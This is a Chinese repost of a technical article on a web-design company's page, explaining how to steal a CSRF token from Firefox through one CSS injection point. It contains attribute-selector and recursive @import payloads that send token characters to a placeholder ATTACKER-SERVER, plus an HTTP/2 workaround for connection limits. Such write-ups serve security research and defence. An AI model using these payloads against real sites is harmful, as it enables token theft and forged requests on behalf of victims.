怎么利用单一注入点从Firefox浏览器中提取CSS数据

这篇文章主要介绍了怎么利用单一注入点从Firefox浏览器中提取CSS数据，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让小编带着大家一起了解一下。

站在用户的角度思考问题，与客户深入沟通，找到罗庄网站设计与罗庄网站推广的解决方案，凭借多年的经验，让设计与互联网技术结合，创造个性化、用户体验好的作品，建站类型包括：成都做网站、成都网站建设、企业官网、英文网站、手机端网站、网站推广、申请域名、网站空间、企业邮箱。业务覆盖罗庄地区。

基础技术和现有技术

在我们的演示样例中，假设我们想获取元素中的CSRF令牌：

可能是由于内容安全策略的原因，这里我们无法使用脚本来实现这个目的，因此我们尝试寻找基于样式的注入点。一般来说，我们会选择使用属性选择器：

input[name='csrftoken'][value^='a'] {  background: url(//ATTACKER-SERVER/leak/a);}input[name='csrftoken'][value^='b'] {  background: url(//ATTACKER-SERVER/leak/b);}...input[name='csrftoken'][value^='z'] {  background: url(//ATTACKER-SERVER/leak/z);}

如果这里部署了CSS规则，那么攻击者就可以获取一个HTTP请求，然后提取令牌的第一个字符。接下来，攻击者需要准备另一个样式表，其中需要包含已窃取的第一个字符：

input[name='csrftoken'][value^='aa'] {  background: url(//ATTACKER-SERVER/leak/aa);}input[name='csrftoken'][value^='ab'] {  background: url(//ATTACKER-SERVER/leak/ab);}...input[name='csrftoken'][value^='az'] {  background: url(//ATTACKER-SERVER/leak/az);}

此时，攻击者需要重新加载目标页面中的以提供后续的样式表。</p><p>在2018年，Pepe Vila提供了一种利用CSS递归导入的方式实现在Chrome浏览器中的单一注入点利用技术。而在2019年，Nathanial Lattimer（@d0nutptr）基于该技术重新提出了一种    改进方案，这种技术比较适用于本文针对Firefox浏览器的场景。</p><p>在第一次注入时，我们需要用到大量import：</p><pre>@import url(//ATTACKER-SERVER/polling?len=0);@import url(//ATTACKER-SERVER/polling?len=1);@import url(//ATTACKER-SERVER/polling?len=2);...</pre><h4>该技术的运行机制如下：</h4><p>首先，在一开始只有第一个@import会返回一个样式表，其他语句处于连接阻塞状态。此时，第一个@import返回目标样式表，其中包含了令牌的第一个字符。接下来，当泄露的第一个令牌抵达攻击者的<a title="服务器" target="_blank" href="http://www.cdfuwuqi.com/">服务器</a>端ATTACKER-SERVER之后，第二个@import将停止阻塞，并返回包含令牌第一个字符的样式表，然后尝试获取令牌中的第二个字符。最后，当第二个泄露字符到达攻击者的服务器端ATTACKER-SERVER之后，第三个@import将停止阻塞……以此类推。</p><p>这种技术之所以有效，是因为Chrome会采用异步方式处理@import，因此当任何@import停止阻塞时，Chrome会立即解析该语句并应用执行。</p><h3>Firefox与样式表处理</h3><p>跟Chrome相比，Firefox针对样式表的处理方式完全不同。首先，Firefox会采用同步方式处理样式表。因此，当样式表中有多个@import时，只有当所有@import都处理完毕时CSS规则才会被应用。比如说：</p><pre><style>@import '/polling/0';@import '/polling/1';@import '/polling/2';</style></pre><p>假设第一个@import返回CSS规则时，会将页面背景设置为蓝色，后面的@import将处于阻塞状态。在Chrome中，页面会立即变成蓝色，但是在Firefox中却不会有任何反应。</p><p>此时，我们可以将所有的@import单独放在<style>元素中：</p><pre><style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style></pre><p>在上述代码中，Firefox会分别处理所有的样式表，此时Firefox中的页面会立刻变蓝色，其他的@import会在后台进行处理。</p><p>不过这里还有一个问题，比如说我们想窃取包含10个字符的令牌：</p><pre><style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>...<style>@import '/polling/10';</style></pre><p>Firefox会立即将10个@import加入队列。在处理完第一个@import之后，Firefox会将带有已知字符的另一个请求加入队列。问题就在于，该请求会被追加到队尾处。在默认情况下，浏览器跟同一个服务器只能建立六条并发链接。因此，带有已知字符的请求永远不会到达目标服务器，因为该服务器已经有六条阻塞链接了，此时便会发生死锁。</p><h3>解决方案：HTTP/2</h3><p>六条并发链接的限制是由TCP层决定的，因此单台服务器同时只能存在六条TCP链接。而HTTP/2的其中一个优势就在于，它支持通过单个链接来发送多个HTTP请求（即多路复用），从而大大提升网络性能。</p><p>但是，Firefox针对单个HTTP/2连接的并发请求数也有限制，默认配置下限制数量为100条。如果需要使用更多的并发链接，则需要使用不同的主机名来设置，并强制Firefox创建第多条TCP链接。</p><p>比如说，如果我们创建到https://localhost:3000的100个请求，然后又创建到https://127.0.0.1:3000的50个请求，那么Firefox就会创建两条TCP链接。</p><p>利用技术</p><p>技术利用场景如下：</p><blockquote><p>1、代码基于HTTP/2实现；</p><p>2、“/polling/:session/:index”节点会返回一个CSS并泄露第“:index”个字符。该请求会处于阻塞状态，直到前一个请求成功泄露第“:index-1”个字符为止。其中，“:session”路径参数用来区分多次攻击行为。</p><p>3、通过“/leak/:session/:value”节点来获取完整的令牌，这里的“:value”即为获取到的完整令牌值。</p><p>4、为了强制Firefox向同一个服务器发起两条TCP链接，这里用到了两个节点，即https://localhost:3000和https://127.0.0.1:3000。</p><p>5、使用“/generate”节点来生成样本代码。</p></blockquote><h3>测试演示</h3><p><img src="/upload/otherpic59/302127.jpg" alt="怎么利用单一注入点从Firefox浏览器中提取CSS数据"></p><p>感谢你能够认真阅读完这篇文章，希望小编分享的“怎么利用单一注入点从Firefox浏览器中提取CSS数据”这篇文章对大家有帮助，同时也希望大家多多支持创新互联，关注创新互联行业资讯频道，更多相关知识等着你来学习!</p> <br> 网页题目：怎么利用单一注入点从Firefox浏览器中提取CSS数据 <br> 当前网址：<a href="http://kswsj.com/article/jdsdie.html">http://kswsj.com/article/jdsdie.html</a> </div> </div> <div class="other"> <h3>其他资讯</h3> <ul> <li> <a href="/article/dcodjco.html">linux权限命令详解 linux的权限命令</a> </li><li> <a href="/article/dcodjsi.html">php数据库存储读取 php把数据存入数据库</a> </li><li> <a href="/article/dcodjsp.html">使用php提取音频数据 php提取图片文字</a> </li><li> <a href="/article/dcodjsh.html">ChatGPT概念股分化 ppact概念股</a> </li><li> <a href="/article/dcodgsc.html">比系统和sap系统区别的简单介绍</a> </li> </ul> </div> </div>  <div class="c"></div>  <div id="fd" class="index-fd pr"> <div class="map-bg3"></div> <div class="wp"> <div class="fd-top"> <dl> <dt>关于我们</dt> <dd> <ul class="ul-fd"> <li><a href="http://www.kswsj.com/about#whous">我们是谁</a></li> <li><a href="http://www.kswsj.com/about#ourcus">我们服务的客户</a></li> <li><a href="http://www.kswsj.com/about#ourteam">我们的团队</a></li> </ul> </dd> </dl> <dl> <dt>我们的服务</dt> <dd> <ul class="ul-fd"> <li><a href="http://www.kswsj.com/service#webbuit">网站建设</a></li> <li><a href="http://www.kswsj.com/service#weiweb">H5响应式交互网站</a></li> <li><a href="http://www.kswsj.com/service#webmobel">移动端 & 微网站定制</a></li> <li><a href="http://www.kswsj.com/service#servweb">服务流程</a></li> <li><a href="http://www.kswsj.com/service#solution">行业解决方案</a></li> </ul> </dd> </dl> <dl> <dt>网站建设案例</dt> <dd> <ul class="ul-fd"> <li><a href="http://www.kswsj.com/case/">公司集团</a></li> <li><a href="http://www.kswsj.com/case/">数码电子科技</a></li> <li><a href="http://www.kswsj.com/case/">建筑与设计</a></li> <li><a href="http://www.kswsj.com/case/">安防门禁</a></li> <li><a href="http://www.kswsj.com/case/">管理咨询美容</a></li> <li><a href="http://www.kswsj.com/case/">外贸行业</a></li> </ul> </dd> </dl> <dl> <dt>新闻动态</dt> <dd> <ul class="ul-fd"> <li><a href="/news/2.html">成都网站建设</a></li><li><a href="/news/3.html">成都网站制作</a></li><li><a href="/news/4.html">成都网站设计</a></li> </ul> </dd> </dl> <dl> <dt>联系我们</dt> <dd class="pr"> <p><a href="http://www.kswsj.com/news/" class="weixin"></a><a href="http://www.kswsj.com/news/" class="sina"></a><span class="weixin-pic"><img src="/Public/Home/pic/ewm.jpg"></span></p> <p><b class="tel">135-1821-9792</b></p> <h5>公司服务热线</h5> </dd> </dl> </div> <div class="link"> 友情链接： <a href="https://www.cdxwcx.com/city/ziyang/" title="资阳做网站" target="_blank">资阳做网站</a>   <a href="http://www.cdxwcx.cn/tuoguan/jianyang.html" title="简阳机房托管" target="_blank">简阳机房托管</a>   <a href="http://www.cdhuace.com/baozhuang.html" title="产品包装设计" target="_blank">产品包装设计</a>   <a href="http://chengdu.cdcxhl.cn/wechat/ " title="成都微信小程序开发" target="_blank">成都微信小程序开发</a>   <a href="http://m.cdcxhl.cn/H5/ " title="H5建站" target="_blank">H5建站</a>   <a href="http://seo.cdkjz.cn/tuiguang/" title="成都网络推广" target="_blank">成都网络推广</a>   <a href="https://www.cdxwcx.com/jifang/guanghua.html" title="成都光华机房" target="_blank">成都光华机房</a>   <a href="https://www.cdcxhl.cn/ " title="php主机" target="_blank">php主机</a>   <a href="http://www.cdxwcx.cn/tuoguan/" title="成都主机托管" target="_blank">成都主机托管</a>   <a href="https://www.cdxwcx.com/wangzhan/dingzhi.html" title="成都定制网站" target="_blank">成都定制网站</a>    </div> </div> <div class="fd-copy"> <div class="wp"> <p><span style="color:#CCCCCC;">Copyright © 2009-2022 www.kswsj.com 成都快上网科技有限公司版权所有</span>　<a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow" style="color:#CCCCCC;">蜀ICP备19037934号</a></p> </div> </div> </div> <div class="side"> <ul> <li><a href="http://wpa.qq.com/msgrd?v=3&uin=631063699&site=qq&menu=yes" target="_blank"> <div class="sidebox"><img src="/Public/Home/pic/side_icon02.png">在线咨询</div> </a></li> <li><a href="http://wpa.qq.com/msgrd?v=3&uin=631063699&site=qq&menu=yes" target="_blank"> <div class="sidebox"><img src="/Public/Home/pic/side_icon01.png">在线咨询</div> </a></li> <li><a href="tel:135-1821-9792"> <div class="sidebox"><img src="/Public/Home/pic/side_icon03.png"><span style="font-size:14px">135-1821-9792</span></div> </a></li> </ul> </div> <div class="side2"> <ul> <li><a href="http://www.kswsj.com/news/"><img src="/Public/Home/pic/r_icon1.png" alt="成都网站建设"></a> <div class="weixin"><em></em><img src="/Public/Home/pic/ewm.jpg" alt="成都网站建设"></div> </li> <li><a href="javascript:goTop();" class="sidetop"><img src="/Public/Home/pic/r_icon2.png"></a></li> </ul> </div> <div class="fot"> <ul> <li> <a href="https://p.qiao.baidu.com/cps/mobileChat?siteId=11284691&userId=6256368&type=1&reqParam=%20{%22from%22:0,%22sessionid%22:%22%22,%22siteId%22:%2211284691%22,%22tid%22:%22-1%22,%22userId%22:%226256368%22,%22ttype%22:1,%22siteConfig%22:%20{%22eid%22:%226256368%22,%22queuing%22:%22%22,%22siteToken%22:%226ce441ff9e2d6bedbdfc2a4138de449e%22,%22userId%22:%226256368%22,%22isGray%22:%22false%22,%22wsUrl%22:%22wss://p.qiao.baidu.com/cps3/websocket%22,%22likeVersion%22:%22generic%22,%22siteId%22:%2211284691%22,%22online%22:%22true%22,%22webRoot%22:%22//p.qiao.baidu.com/cps3/%22,%22bid%22:%22160142915792139572%22,%22isSmallFlow%22:0,%22isPreonline%22:0,%22invited%22:0%20},%22config%22:%20{%22themeColor%22:%224d74fa%22%20}%20}&appId=&referer=&iswechat=0&expectWaiter=-1&openid=null&otherParam=null&telephone=null&speedLogId=null&eid=null&siteToken=6ce441ff9e2d6bedbdfc2a4138de449e" target="_blank"> <img src="/Public/Home/pic/fot1.png" alt=""> <p>在线咨询</p> </a> </li> <li> <a href="tel:18980820575" target="_blank"> <img src="/Public/Home/pic/fot2.png" alt=""> <p>拨打电话</p> </a> </li> </ul> </div> <script type="text/javascript" src="/Public/Home/pic/jquery.js"></script> <script type="text/javascript" src="/Public/Home/pic/lib.js"></script> </body></html> <script> $(".con img").each(function(){ var src = $(this).attr("src"); //获取图片地址 var str=new RegExp("http"); var result=str.test(src); if(result==false){ var url = "https://www.cdcxhl.com"+src; //绝对路径 $(this).attr("src",url); } }); window.onload=function(){ document.oncontextmenu=function(){ return false; } } </script>